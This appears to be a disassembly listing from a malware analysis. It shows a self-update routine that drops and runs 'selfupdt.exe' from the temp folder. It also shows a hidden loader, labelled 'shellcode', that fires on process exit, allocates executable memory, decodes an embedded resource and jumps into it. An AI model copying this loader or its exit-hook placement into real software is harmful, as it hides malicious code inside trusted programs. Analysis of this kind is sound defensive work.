.text:0040353a  8d8d9ef3ffff    LEA                 ECX=>local_c66,[0xfffff39e + EBP]       
.text:00403540  51              PUSH                ECX                                     
.text:00403541  bb01000000      MOV                 EBX,0x1                                 
.text:00403546  6689859cf...    MOV                 word ptr [local_c68+0x4 + EBP],AX       
.text:0040354d  e8fe470f00      CALL                FUN_004f7d50                            ;int * FUN_004f7d50(int * param_1, by...
.text:00403552  83c40c          ADD                 ESP,0xc                                 
.text:00403555  6800040000      PUSH                0x400                                   ;DWORD nSize for GetModuleFileNameW
.text:0040355a  8d959cf3ffff    LEA                 EDX=>local_c68,[0xfffff39c + EBP]       
.text:00403560  52              PUSH                EDX                                     ;LPWSTR lpFilename for GetModuleFileN...
.text:00403561  6a00            PUSH                0x0                                     ;HMODULE hModule for GetModuleFileNameW
.text:00403563  ff1528c45100    CALL                dword ptr [->KERNEL32.DLL::GetModuleF...
.text:00403569  8d859cf3ffff    LEA                 EAX=>local_c68,[0xfffff39c + EBP]       
.text:0040356f  6a5c            PUSH                0x5c                                    
.text:00403571  50              PUSH                EAX                                     
.text:00403572  e853480f00      CALL                _wcsrchr                                ;wchar_t * _wcsrchr(wchar_t * _Str, w...
.text:00403577  83c408          ADD                 ESP,0x8                                 
.text:0040357a  85c0            TEST                EAX,EAX                                 
.text:0040357c  7405            JZ                  LAB_00403583                            
.text:0040357e  33c9            XOR                 ECX,ECX                                 
.text:00403580  668908          MOV                 word ptr [EAX],CX                       
                            LAB_00403583:                 ;XREF[1,0]:   0040357c
.text:00403583  8d959cf3ffff    LEA                 EDX=>local_c68,[0xfffff39c + EBP]       
.text:00403589  52              PUSH                EDX                                     
.text:0040358a  6850dd5100      PUSH                .rdata:u_Data_to_write_to_registry_as...;= u"Data to write to registry as Sel...
.text:0040358f  e8ece0ffff      CALL                printf_wrapper2                         ;undefined printf_wrapper2(wchar_t * ...
.text:00403594  83c408          ADD                 ESP,0x8                                 
.text:00403597  8d859cf3ffff    LEA                 EAX=>local_c68,[0xfffff39c + EBP]       
.text:0040359d  50              PUSH                EAX                                     ;LPCWSTR lpString for lstrlenW
.text:0040359e  ff154cc45100    CALL                dword ptr [->KERNEL32.DLL::lstrlenW]    
.text:004035a4  8b9598ebffff    MOV                 EDX,dword ptr [local_146c+0x4 + EBP]    
.text:004035aa  03c0            ADD                 EAX,EAX                                 
.text:004035ac  50              PUSH                EAX                                     ;DWORD cbData for RegSetValueExW
.text:004035ad  8d8d9cf3ffff    LEA                 ECX=>local_c68,[0xfffff39c + EBP]       
.text:004035b3  51              PUSH                ECX                                     ;BYTE * lpData for RegSetValueExW
.text:004035b4  6a01            PUSH                0x1                                     ;DWORD dwType for RegSetValueExW
.text:004035b6  6a00            PUSH                0x0                                     ;DWORD Reserved for RegSetValueExW
.text:004035b8  68e4d45100      PUSH                .rdata:u_SelfUpdtPath_0051d4e4          ;LPCWSTR lpValueName for RegSetValueExW
.text:004035bd  52              PUSH                EDX                                     ;HKEY hKey for RegSetValueExW
.text:004035be  ff1500c05100    CALL                dword ptr [->ADVAPI32.DLL::RegSetValu...
.text:004035c4  85c0            TEST                EAX,EAX                                 
.text:004035c6  7507            JNZ                 LAB_004035cf                            
.text:004035c8  680cdd5100      PUSH                .rdata:u_Set_SelfUpdtPath_registry_ke...;= u"Set SelfUpdtPath registry key\n"
.text:004035cd  eb05            JMP                 LAB_004035d4                            
                            LAB_004035cf:                 ;XREF[1,0]:   004035c6
.text:004035cf  68b8dc5100      PUSH                .rdata:u_Failed_to_set_SelfUpdtPath_r...;= u"Failed to set SelfUpdtPath regis...
                            LAB_004035d4:                 ;XREF[2,0]:   0040352d,004035cd
.text:004035d4  e8a7e0ffff      CALL                printf_wrapper2                         ;undefined printf_wrapper2(wchar_t * ...
.text:004035d9  83c404          ADD                 ESP,0x4                                 
.text:004035dc  8d8d88ebffff    LEA                 ECX=>local_147c,[0xffffeb88 + EBP]      
.text:004035e2  e859eeffff      CALL                FUN_00402440                            ;undefined FUN_00402440(int * param_1)
.text:004035e7  8d8d84ebffff    LEA                 ECX=>local_1480,[0xffffeb84 + EBP]      
.text:004035ed  c745fcfff...    MOV                 dword ptr [EBP + local_8+0x4],0xffffffff
.text:004035f4  e847eeffff      CALL                FUN_00402440                            ;undefined FUN_00402440(int * param_1)
                            LAB_004035f9:                 ;XREF[4,0]:   00403361,0040336e,00403391,004034db
.text:004035f9  8b8598ebffff    MOV                 EAX,dword ptr [local_146c+0x4 + EBP]    
.text:004035ff  50              PUSH                EAX                                     ;HKEY hKey for RegCloseKey
.text:00403600  ff1568c05100    CALL                dword ptr [->ADVAPI32.DLL::RegCloseKey] 
.text:00403606  85db            TEST                EBX,EBX                                 
.text:00403608  0f8408010000    JZ                  LAB_00403716                            
.text:0040360e  687cdc5100      PUSH                .rdata:u_blSelfUpdateRequest_=_true_0...;= u"blSelfUpdateRequest = true\n"
.text:00403613  e868e0ffff      CALL                printf_wrapper2                         ;undefined printf_wrapper2(wchar_t * ...
.text:00403618  83c404          ADD                 ESP,0x4                                 
.text:0040361b  ff1538c45100    CALL                dword ptr [->KERNEL32.DLL::GetCurrent...
.text:00403621  83bd8cebf...    CMP                 dword ptr [local_1478+0x4 + EBP],0x1    
.text:00403628  a3004f5600      MOV                 [.data:DAT_00564f00],EAX                
.text:0040362d  7517            JNZ                 LAB_00403646                            
.text:0040362f  6838dc5100      PUSH                .rdata:u_Current_version_less_than_3....;= u"Current version less than 3.3.4\n"
.text:00403634  e847e0ffff      CALL                printf_wrapper2                         ;undefined printf_wrapper2(wchar_t * ...
.text:00403639  68f0db5100      PUSH                .rdata:u_LiveUpdate.exe_ALU.exe_LiveU...;= u"LiveUpdate.exe ALU.exe LiveUpdt....
.text:0040363e  e8fd0b0000      CALL                FUN_00404240                            ;undefined FUN_00404240(wchar_t * par...
.text:00403643  83c408          ADD                 ESP,0x8                                 
                            LAB_00403646:                 ;XREF[1,0]:   0040362d
.text:00403646  33c9            XOR                 ECX,ECX                                 
.text:00403648  6806020000      PUSH                0x206                                   
.text:0040364d  51              PUSH                ECX                                     
.text:0040364e  8d95a2fbffff    LEA                 EDX=>local_462,[0xfffffba2 + EBP]       
.text:00403654  52              PUSH                EDX                                     
.text:00403655  66898da0f...    MOV                 word ptr [local_464+0x4 + EBP],CX       
.text:0040365c  e8ef460f00      CALL                FUN_004f7d50                            ;int * FUN_004f7d50(int * param_1, by...
.text:00403661  33c0            XOR                 EAX,EAX                                 
.text:00403663  6806020000      PUSH                0x206                                   
.text:00403668  50              PUSH                EAX                                     
.text:00403669  8d8daafdffff    LEA                 ECX=>local_25a,[0xfffffdaa + EBP]       
.text:0040366f  51              PUSH                ECX                                     
.text:00403670  668985a8f...    MOV                 word ptr [file_name+0x4 + EBP],AX       
.text:00403677  e8d4460f00      CALL                FUN_004f7d50                            ;int * FUN_004f7d50(int * param_1, by...
.text:0040367c  83c418          ADD                 ESP,0x18                                
.text:0040367f  8d95a0fbffff    LEA                 EDX=>local_464,[0xfffffba0 + EBP]       
.text:00403685  52              PUSH                EDX                                     ;LPWSTR lpBuffer for GetTempPathW
.text:00403686  6804010000      PUSH                0x104                                   ;DWORD nBufferLength for GetTempPathW
.text:0040368b  ffd7            CALL                EDI=>KERNEL32.DLL::GetTempPathW         
.text:0040368d  8d85a0fbffff    LEA                 EAX=>local_464,[0xfffffba0 + EBP]       
.text:00403693  50              PUSH                EAX                                     
.text:00403694  8d8da8fdffff    LEA                 ECX=>file_name,[0xfffffda8 + EBP]       
.text:0040369a  6870de5100      PUSH                .rdata:u_%sselfupdt.exe_0051de70        ;= u"%sselfupdt.exe"
.text:0040369f  51              PUSH                ECX                                     
.text:004036a0  ba04010000      MOV                 EDX,0x104                               
.text:004036a5  e886dbffff      CALL                printf_wrapper                          ;void printf_wrapper(undefined4 param...
.text:004036aa  8d95a8fdffff    LEA                 EDX=>file_name,[0xfffffda8 + EBP]       
.text:004036b0  52              PUSH                EDX                                     
.text:004036b1  68ccdb5100      PUSH                .rdata:u_Path_to_save:_%s_0051dbcc      ;= u"Path to save: %s\n"
.text:004036b6  e8c5dfffff      CALL                printf_wrapper2                         ;undefined printf_wrapper2(wchar_t * ...
.text:004036bb  68c4db5100      PUSH                .rdata:DAT_0051dbc4                     ;= 45h    E
.text:004036c0  6888000000      PUSH                0x88                                    
.text:004036c5  8d85a8fdffff    LEA                 EAX=>file_name,[0xfffffda8 + EBP]       
.text:004036cb  50              PUSH                EAX                                     
.text:004036cc  6a00            PUSH                0x0                                     
.text:004036ce  e83de1ffff      CALL                write_something                         ;= 
                                                                                            ;DWORD write_something(HMODULE rsrc_m...
.text:004036d3  83c424          ADD                 ESP,0x24                                
.text:004036d6  85c0            TEST                EAX,EAX                                 
.text:004036d8  743c            JZ                  LAB_00403716                            
.text:004036da  68a0db5100      PUSH                .rdata:u_ExtractFile_OK!_0051dba0       ;= u"ExtractFile OK!\n"
.text:004036df  e89cdfffff      CALL                printf_wrapper2                         ;undefined printf_wrapper2(wchar_t * ...
.text:004036e4  83c404          ADD                 ESP,0x4                                 
.text:004036e7  6a00            PUSH                0x0                                     ;INT nShowCmd for ShellExecuteW
.text:004036e9  8d8da0fbffff    LEA                 ECX=>local_464,[0xfffffba0 + EBP]       
.text:004036ef  51              PUSH                ECX                                     ;LPCWSTR lpDirectory for ShellExecuteW
.text:004036f0  6a00            PUSH                0x0                                     ;LPCWSTR lpParameters for ShellExecuteW
.text:004036f2  6884db5100      PUSH                .rdata:u_selfupdt.exe_0051db84          ;LPCWSTR lpFile for ShellExecuteW
.text:004036f7  6834cd5100      PUSH                .rdata:u_open_0051cd34                  ;LPCWSTR lpOperation for ShellExecuteW
.text:004036fc  6a00            PUSH                0x0                                     ;HWND hwnd for ShellExecuteW
.text:004036fe  ff1500c55100    CALL                dword ptr [->SHELL32.DLL::ShellExecuteW]
.text:00403704  83f820          CMP                 EAX,0x20                                
.text:00403707  7e0d            JLE                 LAB_00403716                            
.text:00403709  6860db5100      PUSH                .rdata:u_ShellExecute_OK!_0051db60      ;= u"ShellExecute OK!\n"
.text:0040370e  e86ddfffff      CALL                printf_wrapper2                         ;undefined printf_wrapper2(wchar_t * ...
.text:00403713  83c404          ADD                 ESP,0x4                                 
                            LAB_00403716:                 ;XREF[4,0]:   004032f6,00403608,004036d8,00403707
.text:00403716  8bc3            MOV                 EAX,EBX                                 
.text:00403718  8b4df4          MOV                 ECX,dword ptr [EBP + local_10+0x4]      
.text:0040371b  64890d000...    MOV                 dword ptr FS:[0x0],ECX                  
.text:00403722  59              POP                 ECX                                     
.text:00403723  5f              POP                 EDI                                     
.text:00403724  5e              POP                 ESI                                     
.text:00403725  5b              POP                 EBX                                     
.text:00403726  8b4df0          MOV                 ECX,dword ptr [EBP + local_14+0x4]      
.text:00403729  33cd            XOR                 ECX,EBP                                 
.text:0040372b  e80e460f00      CALL                FUN_004f7d3e                            ;undefined FUN_004f7d3e(undefined1 pa...
.text:00403730  8be5            MOV                 ESP,EBP                                 
.text:00403732  5d              POP                 EBP                                     
.text:00403733  c3              RET                                                          
                            ;*  Library Function - Single Match                                                                     *
                            ;*  Name: ___crtExitProcess                                                                             *
                            ;*  Library: Visual Studio 2010 Release                                                                 *
                            ;void ___crtExitProcess(int param_1)
          ;param_1       int                  4                      ;XREF[2,0]:   004f973b,004f9744
                                                          ;XREF[4,0]:   004f788b,004f9597,004f9974,00503cd7
.text:004f9736  8bff            MOV                 EDI,EDI                                 
.text:004f9738  55              PUSH                EBP                                     
.text:004f9739  8bec            MOV                 EBP,ESP                                 
.text:004f973b  ff7508          PUSH                dword ptr [EBP + param_1+0x4]           
.text:004f973e  e8c5210200      CALL                shellcode                               ;undefined shellcode(void)
.text:004f9743  59              POP                 ECX                                     
.text:004f9744  ff7508          PUSH                dword ptr [EBP + param_1+0x4]           ;UINT uExitCode for ExitProcess
.text:004f9747  ff1594c25100    CALL                dword ptr [->KERNEL32.DLL::ExitProcess] 
.text:004f974d  cc              INT                 3                                       
                            ;*                                               FUNCTION                                               *
                            ;undefined shellcode(void)
          ;module_add... void *             EAX                      ;XREF[1,0]:   0051b910
          ;buffer        uint *             EAX                      ;XREF[1,0]:   0051b938
          ;real_size     int                ECX                      ;XREF[1,0]:   0051b99d
          ;Rsrc          undefined *        ESI                      ;XREF[1,0]:   0051b9a0
          ;local_8       undefined4          -8                      ;XREF[4,0]:   0051b91e,0051b945,0051b98b,0051b9c3
          ;local_c       undefined4          -c                      ;XREF[2,0]:   0051b92a,0051b97f
          ;local_10      undefined4         -10                      ;XREF[3,0]:   0051b942,0051b959,0051b965
          ;local_14      undefined4         -14                      ;XREF[3,0]:   0051b96f,0051b996,0051b9a4
          ;local_18      undefined4         -18                      ;XREF[3,0]:   0051b988,0051b9aa,0051b9b5
          ;VirtualAlloc  VirtualAlloc * HASH...                      
          ;size          uint           HASH...                      
                                                          ;XREF[1,0]:   004f973e
.text:0051b908  55              PUSH                EBP                                     
.text:0051b909  8bec            MOV                 EBP,ESP                                 
.text:0051b90b  83ec14          SUB                 ESP,0x14                                
.text:0051b90e  6a00            PUSH                0x0                                     ;LPCWSTR lpModuleName for GetModuleHa...
.text:0051b910  ff1504c45100    CALL                dword ptr [->KERNEL32.DLL::GetModuleH...
.text:0051b916  85c0            TEST                module_addr_0x40...,module_addr_0x400000
.text:0051b918  0f84a2000000    JZ                  LAB_0051b9c0                            
.text:0051b91e  8945fc          MOV                 dword ptr [EBP +...,module_addr_0x400000
.text:0051b921  ba7cc21100      MOV                 EDX,0x11c27c                            
.text:0051b926  03d0            ADD                 EDX,module_addr_0x400000                
.text:0051b928  8b3a            MOV                 EDI,dword ptr [EDX]                     
.text:0051b92a  897df8          MOV                 dword ptr [EBP + local_c+0x4],EDI       
.text:0051b92d  6a40            PUSH                PAGE_EXECUTE_READWRITE                  
.text:0051b92f  6800100000      PUSH                MEM_COMMIT                              
.text:0051b934  6a20            PUSH                0x20                                    
.text:0051b936  6a00            PUSH                0x0                                     
.text:0051b938  ffd7            CALL                EDI                                     
.text:0051b93a  85c0            TEST                buffer,buffer                           
.text:0051b93c  0f847e000000    JZ                  LAB_0051b9c0                            
.text:0051b942  8945f4          MOV                 dword ptr [EBP + local_10+0x4],buffer   
.text:0051b945  8b75fc          MOV                 ESI,dword ptr [EBP + local_8+0x4]       
.text:0051b948  81c678ec1600    ADD                 ESI,0x16ec78                            
.text:0051b94e  8bf8            MOV                 EDI,buffer                              
                            ;copy 32bytes of Rsrc to buffer
.text:0051b950  b910000000      MOV                 ECX,0x10                                
                            LAB_0051b955:                 ;XREF[1,0]:   0051b957
.text:0051b955  ac              LODSB               ESI                                     
.text:0051b956  aa              STOSB               ES:EDI                                  
.text:0051b957  e2fc            LOOP                LAB_0051b955                            
.text:0051b959  8b55f4          MOV                 EDX,dword ptr [EBP + local_10+0x4]      
.text:0051b95c  52              PUSH                EDX                                     
.text:0051b95d  6a10            PUSH                0x10                                    
.text:0051b95f  52              PUSH                EDX                                     
.text:0051b960  e89dfeffff      CALL                decode                                  ;undefined decode(uint * buffer, int ...
.text:0051b965  8b55f4          MOV                 EDX,dword ptr [EBP + local_10+0x4]      
.text:0051b968  8b4208          MOV                 buffer,dword ptr [EDX + 0x8]            
.text:0051b96b  85c0            TEST                buffer,buffer                           
.text:0051b96d  7451            JZ                  LAB_0051b9c0                            
.text:0051b96f  8945f0          MOV                 dword ptr [EBP + local_14+0x4],buffer   
.text:0051b972  83c010          ADD                 buffer,0x10                             
.text:0051b975  6a40            PUSH                0x40                                    
.text:0051b977  6800100000      PUSH                0x1000                                  
.text:0051b97c  50              PUSH                buffer                                  
.text:0051b97d  6a00            PUSH                0x0                                     
.text:0051b97f  8b55f8          MOV                 EDX,dword ptr [EBP + local_c+0x4]       
.text:0051b982  ffd2            CALL                EDX                                     
.text:0051b984  85c0            TEST                buffer,buffer                           
.text:0051b986  7438            JZ                  LAB_0051b9c0                            
.text:0051b988  8945ec          MOV                 dword ptr [EBP + local_18+0x4],buffer   
.text:0051b98b  8b75fc          MOV                 ESI,dword ptr [EBP + local_8+0x4]       
.text:0051b98e  81c678ec1600    ADD                 ESI,0x16ec78                            
.text:0051b994  8bf8            MOV                 EDI,buffer                              
.text:0051b996  8b4df0          MOV                 ECX,dword ptr [EBP + local_14+0x4]      
.text:0051b999  85c9            TEST                ECX,ECX                                 
.text:0051b99b  7423            JZ                  LAB_0051b9c0                            
.text:0051b99d  83c110          ADD                 real_size,0x10                          
                            LAB_0051b9a0:                 ;XREF[1,0]:   0051b9a2
.text:0051b9a0  ac              LODSB               Rsrc                                    
.text:0051b9a1  aa              STOSB               ES:EDI                                  
.text:0051b9a2  e2fc            LOOP                LAB_0051b9a0                            
.text:0051b9a4  8b5df0          MOV                 EBX,dword ptr [EBP + local_14+0x4]      
.text:0051b9a7  83c310          ADD                 EBX,0x10                                
.text:0051b9aa  8b55ec          MOV                 EDX,dword ptr [EBP + local_18+0x4]      
.text:0051b9ad  52              PUSH                EDX                                     
.text:0051b9ae  53              PUSH                EBX                                     
.text:0051b9af  52              PUSH                EDX                                     
.text:0051b9b0  e84dfeffff      CALL                decode                                  ;undefined decode(uint * buffer, int ...
.text:0051b9b5  8b55ec          MOV                 EDX,dword ptr [EBP + local_18+0x4]      
.text:0051b9b8  81c2ab0f0000    ADD                 EDX,0xfab                               
.text:0051b9be  ffd2            CALL                EDX                                     
                            LAB_0051b9c0:                 ;XREF[5,0]:   0051b918,0051b93c,0051b96d,0051b986
                                                          ;             0051b99b
.text:0051b9c0  33c0            XOR                 buffer,buffer                           
.text:0051b9c2  50              PUSH                buffer                                  
.text:0051b9c3  8b55fc          MOV                 EDX,dword ptr [EBP + local_8+0x4]       
.text:0051b9c6  81c294c21100    ADD                 EDX,0x11c294                            
.text:0051b9cc  8b1a            MOV                 EBX,dword ptr [EDX]                     
.text:0051b9ce  ffd3            CALL                EBX                                     
.text:0051b9d0  83c414          ADD                 ESP,0x14                                
.text:0051b9d3  8be5            MOV                 ESP,EBP                                 
.text:0051b9d5  c3              RET